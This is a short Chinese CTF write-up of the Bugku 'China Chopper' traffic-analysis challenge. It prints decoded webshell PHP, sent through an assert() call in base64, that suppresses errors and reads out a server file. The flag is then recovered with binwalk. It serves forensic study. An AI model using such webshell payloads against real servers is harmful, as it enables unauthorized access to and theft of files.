Bugku 分析 中国菜刀

解压之后得到了一个流量包,只有不到10KB,美滋滋

先抓重点,过滤出http,只有6条数据记录,3条post,3条response,3条post都是一样的

随便打开一条pos

是一个assert断言,断言内容是一串base64加密的字符串(最后的%3D先解码为=)

得到了一串php代码

@ini_set("display_errors","0");
@set_time_limit(0);
if(PHP_VERSION<\'5.3.0\')
{
    @set_magic_quotes_runtime(0);
};
echo("X@Y");
$F="C:\\\\wwwroot\\\\flag.tar.gz";
$fp=@fopen($F,\'r\');
if(@fgetc($fp))
{
    @fclose($fp);
    @readfile($F);
}
else
{
    echo(\'ERROR:// Can Not Read\');
};
echo("X@Y");
die();

就是说打印一个叫flag(等等flag?)的文件,并在前后打印X@Y

快乐,只要找到flag.tar.gz就好了

最后一条response中就有这个文件

既然是一个文件中包含另一个文件,那就试一试binwalk

提取并解压,即可得到flag

 

转载于:https://www.cnblogs.com/fantasquex/p/10351617.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值